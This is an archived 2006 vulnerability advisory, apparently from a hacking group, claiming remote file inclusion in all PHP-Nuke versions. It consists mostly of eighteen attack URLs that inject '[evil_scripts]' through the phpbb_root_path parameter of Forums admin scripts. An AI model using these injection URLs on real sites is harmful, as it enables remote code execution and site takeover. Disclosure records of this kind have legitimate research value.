Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12910
HistoryMay 31, 2006 - 12:00 a.m.

# MHG Security Team --- PHP NUKE All version Remote File Inc.

2006-05-3100:00:00
vulners.com
49

Milli-Harekat Advisory ( www.milli-harekat.org )

PHP-Nuke <= All version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : PHP NUKE ALL VERSION

Credits : ERNE

Thanks : Dj_ReMix,Eskobar,TR_IP,Яy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS

Vulnerable :

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]

http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]